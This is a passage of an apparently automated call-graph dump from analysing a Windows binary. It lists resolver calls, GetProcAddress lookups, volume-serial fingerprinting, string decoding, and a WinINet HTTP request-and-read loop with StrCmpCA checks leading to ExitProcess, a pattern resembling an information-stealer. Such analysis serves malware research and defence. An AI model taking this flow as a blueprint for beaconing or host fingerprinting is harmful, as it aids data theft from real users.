API calls 14352->14353 14354 fa3654 14353->14354 14355 fa45c0 2 API calls 14354->14355 14356 fa366d 14355->14356 14357 fa45c0 2 API calls 14356->14357 14358 fa3686 14357->14358 14359 fa45c0 2 API calls 14358->14359 14360 fa369f 14359->14360 14361 fa45c0 2 API calls 14360->14361 14362 fa36b8 14361->14362 14363 fa45c0 2 API calls 14362->14363 14364 fa36d1 14363->14364 14365 fa45c0 2 API calls 14364->14365 14366 fa36ea 14365->14366 14367 fa45c0 2 API calls 14366->14367 14368 fa3703 14367->14368 14369 fa45c0 2 API calls 14368->14369 14370 fa371c 14369->14370 14371 fa45c0 2 API calls 14370->14371 14372 fa3735 14371->14372 14373 fa45c0 2 API calls 14372->14373 14374 fa374e 14373->14374 14375 fa45c0 2 API calls 14374->14375 14376 fa3767 14375->14376 14377 fa45c0 2 API calls 14376->14377 14378 fa3780 14377->14378 14379 fa45c0 2 API calls 14378->14379 14380 fa3799 14379->14380 14381 fa45c0 2 API calls 14380->14381 14382 fa37b2 14381->14382 14383 fa45c0 2 API calls 14382->14383 14384 fa37cb 14383->14384 14385 fa45c0 2 API calls 14384->14385 14386 fa37e4 14385->14386 14387 fa45c0 2 API calls 14386->14387 14388 fa37fd 14387->14388 14389 fa45c0 2 API calls 14388->14389 14390 fa3816 14389->14390 14391 fa45c0 2 API calls 14390->14391 14392 fa382f 14391->14392 14393 fa45c0 2 API calls 14392->14393 14394 fa3848 14393->14394 14395 fa45c0 2 API calls 14394->14395 14396 fa3861 14395->14396 14397 fa45c0 2 API calls 14396->14397 14398 fa387a 14397->14398 14399 fa45c0 2 API calls 14398->14399 14400 fa3893 14399->14400 14401 fa45c0 2 API calls 14400->14401 14402 fa38ac 14401->14402 14403 fa45c0 2 API calls 14402->14403 14404 fa38c5 14403->14404 14405 fa45c0 2 API calls 14404->14405 14406 fa38de 14405->14406 14407 fa45c0 2 API calls 14406->14407 14408 fa38f7 14407->14408 14409 fa45c0 2 API calls 14408->14409 14410 fa3910 14409->14410 14411 fa45c0 2 API calls 14410->14411 14412 fa3929 14411->14412 14413 fa45c0 2 API calls 14412->14413 14414 fa3942 14413->14414 14415 fa45c0 2 API calls 14414->14415 14416 fa395b 14415->14416 14417 fa45c0 2 API calls 14416->14417 14418 fa3974 14417->14418 14419 fa45c0 2 API calls 14418->14419 14420 fa398d 14419->14420 14421 fa45c0 2 API calls 14420->14421 14422 fa39a6 14421->14422 14423 fa45c0 2 API calls 14422->14423 14424 fa39bf 14423->14424 14425 fa45c0 2 API calls 14424->14425 14426 fa39d8 14425->14426 14427 fa45c0 2 API calls 14426->14427 14428 fa39f1 14427->14428 14429 fa45c0 2 API calls 14428->14429 14430 fa3a0a 14429->14430 14431 fa45c0 2 API calls 14430->14431 14432 fa3a23 14431->14432 14433 fa45c0 2 API calls 14432->14433 14434 fa3a3c 14433->14434 14435 fa45c0 2 API calls 14434->14435 14436 fa3a55 14435->14436 14437 fa45c0 2 API calls 14436->14437 14438 fa3a6e 14437->14438 14439 fa45c0 2 API calls 14438->14439 14440 fa3a87 14439->14440 14441 fa45c0 2 API calls 14440->14441 14442 fa3aa0 14441->14442 14443 fa45c0 2 API calls 14442->14443 14444 fa3ab9 14443->14444 14445 fa45c0 2 API calls 14444->14445 14446 fa3ad2 14445->14446 14447 fa45c0 2 API calls 14446->14447 14448 fa3aeb 14447->14448 14449 fa45c0 2 API calls 14448->14449 14450 fa3b04 14449->14450 14451 fa45c0 2 API calls 14450->14451 14452 fa3b1d 14451->14452 14453 fa45c0 2 API calls 14452->14453 14454 fa3b36 14453->14454 14455 fa45c0 2 API calls 14454->14455 14456 fa3b4f 14455->14456 14457 fa45c0 2 API calls 14456->14457 14458 fa3b68 14457->14458 14459 fa45c0 2 API calls 14458->14459 14460 fa3b81 14459->14460 14461 fa45c0 2 API calls 14460->14461 14462 fa3b9a 14461->14462 14463 fa45c0 2 API calls 14462->14463 14464 fa3bb3 14463->14464 14465 fa45c0 2 API calls 14464->14465 14466 fa3bcc 14465->14466 14467 fa45c0 2 API calls 14466->14467 14468 fa3be5 14467->14468 14469 fa45c0 2 API calls 14468->14469 14470 fa3bfe 14469->14470 14471 fa45c0 2 API calls 14470->14471 14472 fa3c17 14471->14472 14473 fa45c0 2 API calls 14472->14473 14474 fa3c30 14473->14474 14475 fa45c0 2 API calls 14474->14475 14476 fa3c49 14475->14476 14477 fa45c0 2 API calls 14476->14477 14478 fa3c62 14477->14478 14479 fa45c0 2 API calls 14478->14479 14480 fa3c7b 14479->14480 14481 fa45c0 2 API calls 14480->14481 14482 fa3c94 14481->14482 14483 fa45c0 2 API calls 14482->14483 14484 fa3cad 14483->14484 14485 fa45c0 2 API calls 14484->14485 14486 fa3cc6 14485->14486 14487 fa45c0 2 API calls 14486->14487 14488 fa3cdf 14487->14488 14489 fa45c0 2 API calls 14488->14489 14490 fa3cf8 14489->14490 14491 fa45c0 2 API calls 14490->14491 14492 fa3d11 14491->14492 14493 fa45c0 2 API calls 14492->14493 14494 fa3d2a 14493->14494 14495 fa45c0 2 API calls 14494->14495 14496 fa3d43 14495->14496 14497 fa45c0 2 API calls 14496->14497 14498 fa3d5c 14497->14498 14499 fa45c0 2 API calls 14498->14499 14500 fa3d75 14499->14500 14501 fa45c0 2 API calls 14500->14501 14502 fa3d8e 14501->14502 14503 fa45c0 2 API calls 14502->14503 14504 fa3da7 14503->14504 14505 fa45c0 2 API calls 14504->14505 14506 fa3dc0 14505->14506 14507 fa45c0 2 API calls 14506->14507 14508 fa3dd9 14507->14508 14509 fa45c0 2 API calls 14508->14509 14510 fa3df2 14509->14510 14511 fa45c0 2 API calls 14510->14511 14512 fa3e0b 14511->14512 14513 fa45c0 2 API calls 14512->14513 14514 fa3e24 14513->14514 14515 fa45c0 2 API calls 14514->14515 14516 fa3e3d 14515->14516 14517 fa45c0 2 API calls 14516->14517 14518 fa3e56 14517->14518 14519 fa45c0 2 API calls 14518->14519 14520 fa3e6f 14519->14520 14521 fa45c0 2 API calls 14520->14521 14522 fa3e88 14521->14522 14523 fa45c0 2 API calls 14522->14523 14524 fa3ea1 14523->14524 14525 fa45c0 2 API calls 14524->14525 14526 fa3eba 14525->14526 14527 fa45c0 2 API calls 14526->14527 14528 fa3ed3 14527->14528 14529 fa45c0 2 API calls 14528->14529 14530 fa3eec 14529->14530 14531 fa45c0 2 API calls 14530->14531 14532 fa3f05 14531->14532 14533 fa45c0 2 API calls 14532->14533 14534 fa3f1e 14533->14534 14535 fa45c0 2 API calls 14534->14535 14536 fa3f37 14535->14536 14537 fa45c0 2 API calls 14536->14537 14538 fa3f50 14537->14538 14539 fa45c0 2 API calls 14538->14539 14540 fa3f69 14539->14540 14541 fa45c0 2 API calls 14540->14541 14542 fa3f82 14541->14542 14543 fa45c0 2 API calls 14542->14543 14544 fa3f9b 14543->14544 14545 fa45c0 2 API calls 14544->14545 14546 fa3fb4 14545->14546 14547 fa45c0 2 API calls 14546->14547 14548 fa3fcd 14547->14548 14549 fa45c0 2 API calls 14548->14549 14550 fa3fe6 14549->14550 14551 fa45c0 2 API calls 14550->14551 14552 fa3fff 14551->14552 14553 fa45c0 2 API calls 14552->14553 14554 fa4018 14553->14554 14555 fa45c0 2 API calls 14554->14555 14556 fa4031 14555->14556 14557 fa45c0 2 API calls 14556->14557 14558 fa404a 14557->14558 14559 fa45c0 2 API calls 14558->14559 14560 fa4063 14559->14560 14561 fa45c0 2 API calls 14560->14561 14562 fa407c 14561->14562 14563 fa45c0 2 API calls 14562->14563 14564 fa4095 14563->14564 14565 fa45c0 2 API calls 14564->14565 14566 fa40ae 14565->14566 14567 fa45c0 2 API calls 14566->14567 14568 fa40c7 14567->14568 14569 fa45c0 2 API calls 14568->14569 14570 fa40e0 14569->14570 14571 fa45c0 2 API calls 14570->14571 14572 fa40f9 14571->14572 14573 fa45c0 2 API calls 14572->14573 14574 fa4112 14573->14574 14575 fa45c0 2 API calls 14574->14575 14576 fa412b 14575->14576 14577 fa45c0 2 API calls 14576->14577 14578 fa4144 14577->14578 14579 fa45c0 2 API calls 14578->14579 14580 fa415d 14579->14580 14581 fa45c0 2 API calls 14580->14581 14582 fa4176 14581->14582 14583 fa45c0 2 API calls 14582->14583 14584 fa418f 14583->14584 14585 fa45c0 2 API calls 14584->14585 14586 fa41a8 14585->14586 14587 fa45c0 2 API calls 14586->14587 14588 fa41c1 14587->14588 14589 fa45c0 2 API calls 14588->14589 14590 fa41da 14589->14590 14591 fa45c0 2 API calls 14590->14591 14592 fa41f3 14591->14592 14593 fa45c0 2 API calls 14592->14593 14594 fa420c 14593->14594 14595 fa45c0 2 API calls 14594->14595 14596 fa4225 14595->14596 14597 fa45c0 2 API calls 14596->14597 14598 fa423e 14597->14598 14599 fa45c0 2 API calls 14598->14599 14600 fa4257 14599->14600 14601 fa45c0 2 API calls 14600->14601 14602 fa4270 14601->14602 14603 fa45c0 2 API calls 14602->14603 14604 fa4289 14603->14604 14605 fa45c0 2 API calls 14604->14605 14606 fa42a2 14605->14606 14607 fa45c0 2 API calls 14606->14607 14608 fa42bb 14607->14608 14609 fa45c0 2 API calls 14608->14609 14610 fa42d4 14609->14610 14611 fa45c0 2 API calls 14610->14611 14612 fa42ed 14611->14612 14613 fa45c0 2 API calls 14612->14613 14614 fa4306 14613->14614 14615 fa45c0 2 API calls 14614->14615 14616 fa431f 14615->14616 14617 fa45c0 2 API calls 14616->14617 14618 fa4338 14617->14618 14619 fa45c0 2 API calls 14618->14619 14620 fa4351 14619->14620 14621 fa45c0 2 API calls 14620->14621 14622 fa436a 14621->14622 14623 fa45c0 2 API calls 14622->14623 14624 fa4383 14623->14624 14625 fa45c0 2 API calls 14624->14625 14626 fa439c 14625->14626 14627 fa45c0 2 API calls 14626->14627 14628 fa43b5 14627->14628 14629 fa45c0 2 API calls 14628->14629 14630 fa43ce 14629->14630 14631 fa45c0 2 API calls 14630->14631 14632 fa43e7 14631->14632 14633 fa45c0 2 API calls 14632->14633 14634 fa4400 14633->14634 14635 fa45c0 2 API calls 14634->14635 14636 fa4419 14635->14636 14637 fa45c0 2 API calls 14636->14637 14638 fa4432 14637->14638 14639 fa45c0 2 API calls 14638->14639 14640 fa444b 14639->14640 14641 fa45c0 2 API calls 14640->14641 14642 fa4464 14641->14642 14643 fa45c0 2 API calls 14642->14643 14644 fa447d 14643->14644 14645 fa45c0 2 API calls 14644->14645 14646 fa4496 14645->14646 14647 fa45c0 2 API calls 14646->14647 14648 fa44af 14647->14648 14649 fa45c0 2 API calls 14648->14649 14650 fa44c8 14649->14650 14651 fa45c0 2 API calls 14650->14651 14652 fa44e1 14651->14652 14653 fa45c0 2 API calls 14652->14653 14654 fa44fa 14653->14654 14655 fa45c0 2 API calls 14654->14655 14656 fa4513 14655->14656 14657 fa45c0 2 API calls 14656->14657 14658 fa452c 14657->14658 14659 fa45c0 2 API calls 14658->14659 14660 fa4545 14659->14660 14661 fa45c0 2 API calls 14660->14661 14662 fa455e 14661->14662 14663 fa45c0 2 API calls 14662->14663 14664 fa4577 14663->14664 14665 fa45c0 2 API calls 14664->14665 14666 fa4590 14665->14666 14667 fa45c0 2 API calls 14666->14667 14668 fa45a9 14667->14668 14669 fb9c10 14668->14669 14670 fb9c20 43 API calls 14669->14670 14671 fba036 8 API calls 14669->14671 14670->14671 14672 fba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14671->14672 14673 fba146 14671->14673 14672->14673 14674 fba153 8 API calls 14673->14674 14675 fba216 14673->14675 14674->14675 14676 fba298 14675->14676 14677 fba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14675->14677 14678 fba337 14676->14678 14679 fba2a5 6 API calls 14676->14679 14677->14676 14680 fba41f 14678->14680 14681 fba344 9 API calls 14678->14681 14679->14678 14682 fba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14680->14682 14683 fba4a2 14680->14683 14681->14680 14682->14683 14684 fba4ab GetProcAddress GetProcAddress 14683->14684 14685 fba4dc 14683->14685 14684->14685 14686 fba515 14685->14686 14687 fba4e5 GetProcAddress GetProcAddress 14685->14687 14688 fba612 14686->14688 14689 fba522 10 API calls 14686->14689 14687->14686 14690 fba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14688->14690 14691 fba67d 14688->14691 14689->14688 14690->14691 14692 fba69e 14691->14692 14693 fba686 GetProcAddress 14691->14693 14694 fb5ca3 14692->14694 14695 fba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14692->14695 14693->14692 14696 fa1590 14694->14696 14695->14694 15817 fa1670 14696->15817 14699 fba7a0 lstrcpy 14700 fa15b5 14699->14700 14701 fba7a0 lstrcpy 14700->14701 14702 fa15c7 14701->14702 14703 fba7a0 lstrcpy 14702->14703 14704 fa15d9 14703->14704 14705 fba7a0 lstrcpy 14704->14705 14706 fa1663 14705->14706 14707 fb5510 14706->14707 14708 fb5521 14707->14708 14709 fba820 2 API calls 14708->14709 14710 fb552e 14709->14710 14711 fba820 2 API calls 14710->14711 14712 fb553b 14711->14712 14713 fba820 2 API calls 14712->14713 14714 fb5548 14713->14714 14715 fba740 lstrcpy 14714->14715 14716 fb5555 14715->14716 14717 fba740 lstrcpy 14716->14717 14718 fb5562 14717->14718 14719 fba740 lstrcpy 14718->14719 14720 fb556f 14719->14720 14721 fba740 lstrcpy 14720->14721 14752 fb557c 14721->14752 14722 fa1590 lstrcpy 14722->14752 14723 fb52c0 25 API calls 14723->14752 14724 fb51f0 20 API calls 14724->14752 14725 fb5643 StrCmpCA 14725->14752 14726 fb56a0 StrCmpCA 14727 fb57dc 14726->14727 14726->14752 14728 fba8a0 lstrcpy 14727->14728 14729 fb57e8 14728->14729 14730 fba820 2 API calls 14729->14730 14733 fb57f6 14730->14733 14731 fba740 lstrcpy 14731->14752 14732 fba820 lstrlen lstrcpy 14732->14752 14735 fba820 2 API calls 14733->14735 14734 fb5856 StrCmpCA 14736 fb5991 14734->14736 14734->14752 14740 fb5805 14735->14740 14739 fba8a0 lstrcpy 14736->14739 14737 fba7a0 lstrcpy 14737->14752 14738 fba8a0 lstrcpy 14738->14752 14741 fb599d 14739->14741 14742 fa1670 lstrcpy 14740->14742 14743 fba820 2 API calls 14741->14743 14751 fb5811 14742->14751 14744 fb59ab 14743->14744 14746 fba820 2 API calls 14744->14746 14745 fb5a0b StrCmpCA 14747 fb5a28 14745->14747 14748 fb5a16 Sleep 14745->14748 14749 fb59ba 14746->14749 14750 fba8a0 lstrcpy 14747->14750 14748->14752 14753 fa1670 lstrcpy 14749->14753 14754 fb5a34 14750->14754 14751->13814 14752->14722 14752->14723 14752->14724 14752->14725 14752->14726 14752->14731 14752->14732 14752->14734 14752->14737 14752->14738 14752->14745 14759 fb578a StrCmpCA 14752->14759 14761 fb593f StrCmpCA 14752->14761 14753->14751 14755 fba820 2 API calls 14754->14755 14756 fb5a43 14755->14756 14757 fba820 2 API calls 14756->14757 14758 fb5a52 14757->14758 14760 fa1670 lstrcpy 14758->14760 14759->14752 14760->14751 14761->14752 14763 fb754c 14762->14763 14764 fb7553 GetVolumeInformationA 14762->14764 14763->14764 14765 fb7591 14764->14765 14766 fb75fc GetProcessHeap RtlAllocateHeap 14765->14766 14767 fb7619 14766->14767 14768 fb7628 wsprintfA 14766->14768 14769 fba740 lstrcpy 14767->14769 14770 fba740 lstrcpy 14768->14770 14771 fb5da7 14769->14771 14770->14771 14771->13835 14773 fba7a0 lstrcpy 14772->14773 14774 fa4899 14773->14774 15826 fa47b0 14774->15826 14776 fa48a5 14777 fba740 lstrcpy 14776->14777 14778 fa48d7 14777->14778 14779 fba740 lstrcpy 14778->14779 14780 fa48e4 14779->14780 14781 fba740 lstrcpy 14780->14781 14782 fa48f1 14781->14782 14783 fba740 lstrcpy 14782->14783 14784 fa48fe 14783->14784 14785 fba740 lstrcpy 14784->14785 14786 fa490b InternetOpenA StrCmpCA 14785->14786 14787 fa4944 14786->14787 14788 fa4ecb InternetCloseHandle 14787->14788 15832 fb8b60 14787->15832 14790 fa4ee8 14788->14790 15847 fa9ac0 CryptStringToBinaryA 14790->15847 14791 fa4963 15840 fba920 14791->15840 14795 fa4976 14796 fba8a0 lstrcpy 14795->14796 14801 fa497f 14796->14801 14797 fba820 2 API calls 14798 fa4f05 14797->14798 14799 fba9b0 4 API calls 14798->14799 14802 fa4f1b 14799->14802 14800 fa4f27 ctype 14804 fba7a0 lstrcpy 14800->14804 14805 fba9b0 4 API calls 14801->14805 14803 fba8a0 lstrcpy 14802->14803 14803->14800 14817 fa4f57 14804->14817 14806 fa49a9 14805->14806 14807 fba8a0 lstrcpy 14806->14807 14808 fa49b2 14807->14808 14809 fba9b0 4 API calls 14808->14809 14810 fa49d1 14809->14810 14811 fba8a0 lstrcpy 14810->14811 14812 fa49da 14811->14812 14813 fba920 3 API calls 14812->14813 14814 fa49f8 14813->14814 14815 fba8a0 lstrcpy 14814->14815 14816 fa4a01 14815->14816 14818 fba9b0 4 API calls 14816->14818 14817->13838 14819 fa4a20 14818->14819 14820 fba8a0 lstrcpy 14819->14820 14821 fa4a29 14820->14821 14822 fba9b0 4 API calls 14821->14822 14823 fa4a48 14822->14823 14824 fba8a0 lstrcpy 14823->14824 14825 fa4a51 14824->14825 14826 fba9b0 4 API calls 14825->14826 14827 fa4a7d 14826->14827 14828 fba920 3 API calls 14827->14828 14829 fa4a84 14828->14829 14830 fba8a0 lstrcpy 14829->14830 14831 fa4a8d 14830->14831 14832 fa4aa3 InternetConnectA 14831->14832 14832->14788 14833 fa4ad3 HttpOpenRequestA 14832->14833 14835 fa4b28 14833->14835 14836 fa4ebe InternetCloseHandle 14833->14836 14837 fba9b0 4 API calls 14835->14837 14836->14788 14838 fa4b3c 14837->14838 14839 fba8a0 lstrcpy 14838->14839 14840 fa4b45 14839->14840 14841 fba920 3 API calls 14840->14841 14842 fa4b63 14841->14842 14843 fba8a0 lstrcpy 14842->14843 14844 fa4b6c 14843->14844 14845 fba9b0 4 API calls 14844->14845 14846 fa4b8b 14845->14846 14847 fba8a0 lstrcpy 14846->14847 14848 fa4b94 14847->14848 14849 fba9b0 4 API calls 14848->14849 14850 fa4bb5 14849->14850 14851 fba8a0 lstrcpy 14850->14851 14852 fa4bbe 14851->14852 14853 fba9b0 4 API calls 14852->14853 14854 fa4bde 14853->14854 14855 fba8a0 lstrcpy 14854->14855 14856 fa4be7 14855->14856 14857 fba9b0 4 API calls 14856->14857 14858 fa4c06 14857->14858 14859 fba8a0 lstrcpy 14858->14859 14860 fa4c0f 14859->14860 14861 fba920 3 API calls 14860->14861 14862 fa4c2d 14861->14862 14863 fba8a0 lstrcpy 14862->14863 14864 fa4c36 14863->14864 14865 fba9b0 4 API calls 14864->14865 14866 fa4c55 14865->14866 14867 fba8a0 lstrcpy 14866->14867 14868 fa4c5e 14867->14868 14869 fba9b0 4 API calls 14868->14869 14870 fa4c7d 14869->14870 14871 fba8a0 lstrcpy 14870->14871 14872 fa4c86 14871->14872 14873 fba920 3 API calls 14872->14873 14874 fa4ca4 14873->14874 14875 fba8a0 lstrcpy 14874->14875 14876 fa4cad 14875->14876 14877 fba9b0 4 API calls 14876->14877 14878 fa4ccc 14877->14878 14879 fba8a0 lstrcpy 14878->14879 14880 fa4cd5 14879->14880 14881 fba9b0 4 API calls 14880->14881 14882 fa4cf6 14881->14882 14883 fba8a0 lstrcpy 14882->14883 14884 fa4cff 14883->14884 14885 fba9b0 4 API calls 14884->14885 14886 fa4d1f 14885->14886 14887 fba8a0 lstrcpy 14886->14887 14888 fa4d28 14887->14888 14889 fba9b0 4 API calls 14888->14889 14890 fa4d47 14889->14890 14891 fba8a0 lstrcpy 14890->14891 14892 fa4d50 14891->14892 14893 fba920 3 API calls 14892->14893 14894 fa4d6e 14893->14894 14895 fba8a0 lstrcpy 14894->14895 14896 fa4d77 14895->14896 14897 fba740 lstrcpy 14896->14897 14898 fa4d92 14897->14898 14899 fba920 3 API calls 14898->14899 14900 fa4db3 14899->14900 14901 fba920 3 API calls 14900->14901 14902 fa4dba 14901->14902 14903 fba8a0 lstrcpy 14902->14903 14904 fa4dc6 14903->14904 14905 fa4de7 lstrlen 14904->14905 14906 fa4dfa 14905->14906 14907 fa4e03 lstrlen 14906->14907 15846 fbaad0 14907->15846 14909 fa4e13 HttpSendRequestA 14910 fa4e32 InternetReadFile 14909->14910 14911 fa4e67 InternetCloseHandle 14910->14911 14916 fa4e5e 14910->14916 14914 fba800 14911->14914 14913 fba9b0 4 API calls 14913->14916 14914->14836 14915 fba8a0 lstrcpy 14915->14916 14916->14910 14916->14911 14916->14913 14916->14915 15853 fbaad0 14917->15853 14919 fb17c4 StrCmpCA 14920 fb17cf ExitProcess 14919->14920 14921 fb17d7 14919->14921 14922 fb19c2 14921->14922 14923 fb187f StrCmpCA 14921->14923 14924 fb185d StrCmpCA 14921->14924 14925 fb1913 StrCmpCA 14921->14925 14926 fb1932 StrCmpCA 14921->14926 14927 fb18f1 StrCmpCA 14921->14927 14928 fb1951 StrCmpCA 14921->14928 14929 fb1970 StrCmpCA 14921->14929 14930 fb18cf StrCmpCA 14921->14930 14931 fb18ad StrCmpCA 14921->14931 14932 fba820 lstrlen lstrcpy 14921->14932 14922->13840 14923->14921 14924->14921 14925->14921 14926->14921 14927->14921 14928->14921 14929->14921 14930->14921 14931->14921 14932->14921 14934 fba7a0 lstrcpy 14933->14934 14935 fa5979 14934->14935 14936 fa47b0 2 API calls 14935->14936 14937 fa5985 14936->14937 14938 fba740 lstrcpy 14937->14938 14939 fa59ba 14938->14939 14940 fba740 lstrcpy 14939->14940 14941 fa59c7 14940->14941 14942 fba740 lstrcpy 14941->14942 14943 fa59d4 14942->14943 14944 fba740 lstrcpy 14943->14944 14945 fa59e1 14944->14945 14946 fba740 lstrcpy 14945->14946 14947 fa59ee InternetOpenA StrCmpCA 14946->14947 14948 fa5a1d 14947->14948 14949 fa5fc3 InternetCloseHandle 14948->14949 14950 fb8b60 3 API calls 14948->14950 14951 fa5fe0 14949->14951 14952 fa5a3c 14950->14952 14954 fa9ac0 4 API calls 14951->14954 14953 fba920 3 API calls 14952->14953 14955 fa5a4f 14953->14955 14956 fa5fe6 14954->14956 14957 fba8a0 lstrcpy 14955->14957 14958 fba820 2 API calls 14956->14958 14960 fa601f ctype 14956->14960 14962 fa5a58 14957->14962 14959 fa5ffd 14958->14959 14961 fba9b0 4 API calls 14959->14961 14964 fba7a0 lstrcpy 14960->14964 14963 fa6013 14961->14963 14966 fba9b0 4 API calls 14962->14966 14965 fba8a0 lstrcpy 14963->14965 14974 fa604f 14964->14974 14965->14960 14967 fa5a82 14966->14967 14968 fba8a0 lstrcpy 14967->14968 14969 fa5a8b 14968->14969 14970 fba9b0 4 API calls 14969->14970 14971 fa5aaa 14970->14971 14972 fba8a0 lstrcpy 14971->14972 14973 fa5ab3 14972->14973 14975 fba920 3 API calls 14973->14975 14974->13846 14976 fa5ad1 14975->14976 14977 fba8a0 lstrcpy 14976->14977 14978 fa5ada 14977->14978 14979 fba9b0 4 API calls 14978->14979 14980 fa5af9 14979->14980 14981 fba8a0 lstrcpy 14980->14981 14982 fa5b02 14981->14982 14983 fba9b0 4 API calls 14982->14983 14984 fa5b21 14983->14984 14985 fba8a0 lstrcpy 14984->14985 14986 fa5b2a 14985->14986 14987 fba9b0 4 API calls 14986->14987 14988 fa5b56 14987->14988 14989 fba920 3 API calls 14988->14989 14990 fa5b5d 14989->14990 14991 fba8a0 lstrcpy 14990->14991 14992 fa5b66 14991->14992 14993 fa5b7c InternetConnectA 14992->14993 14993->14949 14994 fa5bac HttpOpenRequestA 14993->14994 14996 fa5c0b 14994->14996 14997 fa5fb6 InternetCloseHandle 14994->14997 14998 fba9b0 4 API calls 14996->14998 14997->14949 14999 fa5c1f 14998->14999 15000 fba8a0 lstrcpy 14999->15000 15001 fa5c28 15000->15001 15002 fba920 3 API calls 15001->15002 15003 fa5c46 15002->15003 15004 fba8a0 lstrcpy 15003->15004 15005 fa5c4f 15004->15005 15006 fba9b0 4 API calls 15005->15006 15007 fa5c6e 15006->15007 15008 fba8a0 lstrcpy 15007->15008 15009 fa5c77 15008->15009 15010 fba9b0 4 API calls 15009->15010 15011 fa5c98 15010->15011 15012 fba8a0 lstrcpy 15011->15012 15013 fa5ca1 15012->15013 15014 fba9b0 4 API calls 15013->15014 15015 fa5cc1 15014->15015 15016 fba8a0 lstrcpy 15015->15016 15017 fa5cca 15016->15017 15018 fba9b0 4 API calls 15017->15018 15019 fa5ce9 15018->15019 15020 fba8a0 lstrcpy 15019->15020 15021 fa5cf2 15020->15021 15022 fba920 3 API calls 15021->15022 15023 fa5d10 15022->15023 15024 fba8a0 lstrcpy 15023->15024 15025 fa5d19 15024->15025 15026 fba9b0 4 API calls 15025->15026 15027 fa5d38 15026->15027 15028 fba8a0 lstrcpy 15027->15028 15029 fa5d41 15028->15029 15030 fba9b0 4 API calls 15029->15030 15031 fa5d60 15030->15031 15032 fba8a0 lstrcpy 15031->15032 15033 fa5d69 15032->15033 15034 fba920 3 API calls 15033->15034 15035 fa5d87 15034->15035 15036 fba8a0 lstrcpy 15035->15036 15037 fa5d90 15036->15037 15038 fba9b0 4 API calls 15037->15038 15039 fa5daf 15038->15039 15040 fba8a0 lstrcpy 15039->15040 15041 fa5db8 15040->15041 15042 fba9b0 4 API calls 15041->15042 15043 fa5dd9 15042->15043 15044 fba8a0 lstrcpy 15043->15044 15045 fa5de2 15044->15045 15046 fba9b0 4 API calls 15045->15046 15047 fa5e02 15046->15047 15048 fba8a0 lstrcpy 15047->15048 15049 fa5e0b 15048->15049 15050 fba9b0 4 API calls 15049->15050 15051 fa5e2a 15050->15051 15052 fba8a0 lstrcpy 15051->15052 15053 fa5e33 15052->15053 15054 fba920 3 API calls 15053->15054 15055 fa5e54 15054->15055 15056 fba8a0 lstrcpy 15055->15056 15057 fa5e5d 15056->15057 15058 fa5e70 lstrlen 15057->15058 15854 fbaad0 15058->15854 15060 fa5e81 lstrlen GetProcessHeap RtlAllocateHeap 15855 fbaad0 15060->15855 15062 fa5eae lstrlen 15063 fa5ebe 15062->15063 15064 fa5ed7 lstrlen 15063->15064 15065 fa5ee7 15064->15065 15066 fa5ef0 lstrlen 15065->15066 15067 fa5f04 15066->15067 15068 fa5f1a lstrlen 15067->15068 15856 fbaad0 15068->15856 15070 fa5f2a HttpSendRequestA 15071 fa5f35 InternetReadFile 15070->15071 15072 fa5f6a InternetCloseHandle 15071->15072 15076 fa5f61 15071->15076 15072->14997 15074 fba9b0 4 API calls 15074->15076 15075 fba8a0 lstrcpy 15075->15076 15076->15071 15076->15072 15076->15074 15076->15075 15079 fb1077 15077->15079 15078 fb1151 15078->13848 15079->15078 15080 fba820 lstrlen lstrcpy 15079->15080 15080->15079 15083 fb0db7 15081->15083 15082 fb0f17 15082->13856 15083->15082 15084 fb0e27 StrCmpCA 15083->15084 15085 fb0e67 StrCmpCA 15083->15085 15086 fb0ea4 StrCmpCA 15083->15086 15087 fba820 lstrlen lstrcpy 15083->15087 15084->15083 15085->15083 15086->15083 15087->15083 15089 fb0f67 15088->15089 15090 fb1044 15089->15090 15091 fb0fb2 StrCmpCA 15089->15091 15092 fba820 lstrlen lstrcpy 15089->15092 15090->13864 15091->15089 15092->15089 15094 fba740 lstrcpy 15093->15094 15095 fb1a26 15094->15095 15096 fba9b0 4 API calls 15095->15096 15097 fb1a37 15096->15097 15098 fba8a0 lstrcpy 15097->15098 15099 fb1a40 15098->15099 15100 fba9b0 4 API calls 15099->15100 15101 fb1a5b 15100->15101 15102 fba8a0 lstrcpy 15101->15102 15103 fb1a64 15102->15103 15104 fba9b0 4 API calls 15103->15104 15105 fb1a7d 15104->15105 15106 fba8a0 lstrcpy 15105->15106 15107 fb1a86 15106->15107 15108 fba9b0 4 API calls 15107->15108 15109 fb1aa1 15108->15109 15110 fba8a0 lstrcpy 15109->15110 15111 fb1aaa 15110->15111 15112 fba9b0 4 API calls 15111->15112 15113 fb1ac3 15112->15113 15114 fba8a0 lstrcpy 15113->15114 15115 fb1acc 15114->15115 15116 fba9b0 4 API calls 15115->15116 15117 fb1ae7 15116->15117 15118 fba8a0 lstrcpy 15117->15118 15119 fb1af0 15118->15119 15120 fba9b0 4 API calls 15119->15120 15121 fb1b09 15120->15121 15122 fba8a0 lstrcpy 15121->15122 15123 fb1b12 15122->15123 15124 fba9b0 4 API calls 15123->15124 15125 fb1b2d 15124->15125 15126 fba8a0 lstrcpy 15125->15126 15127 fb1b36 15126->15127 15128 fba9b0 4 API calls 15127->15128 15129 fb1b4f 15128->15129 15130 fba8a0 lstrcpy 15129->15130 15131 fb1b58 15130->15131 15132 fba9b0 4 API calls 15131->15132 15133 fb1b76 15132->15133 15134 fba8a0 lstrcpy 15133->15134 15135 fb1b7f 15134->15135 15136 fb7500 6 API calls 15135->15136 15137 fb1b96 15136->15137 15138 fba920 3 API calls 15137->15138 15139 fb1ba9 15138->15139 15140 fba8a0 lstrcpy 15139->15140 15141 fb1bb2 15140->15141 15142 fba9b0 4 API calls 15141->15142 15143 fb1bdc 15142->15143 15144 fba8a0 lstrcpy 15143->15144 15145 fb1be5 15144->15145 15146 fba9b0 4 API calls 15145->15146 15147 fb1c05 15146->15147 15148 fba8a0 lstrcpy 15147->15148 15149 fb1c0e 15148->15149 15857 fb7690 GetProcessHeap RtlAllocateHeap 15149->15857 15152 fba9b0 4 API calls 15153 fb1c2e 15152->15153 15154 fba8a0 lstrcpy 15153->15154 15155 fb1c37 15154->15155 15156 fba9b0 4 API calls 15155->15156 15157 fb1c56 15156->15157 15158 fba8a0 lstrcpy 15157->15158 15159 fb1c5f 15158->15159 15160 fba9b0 4 API calls 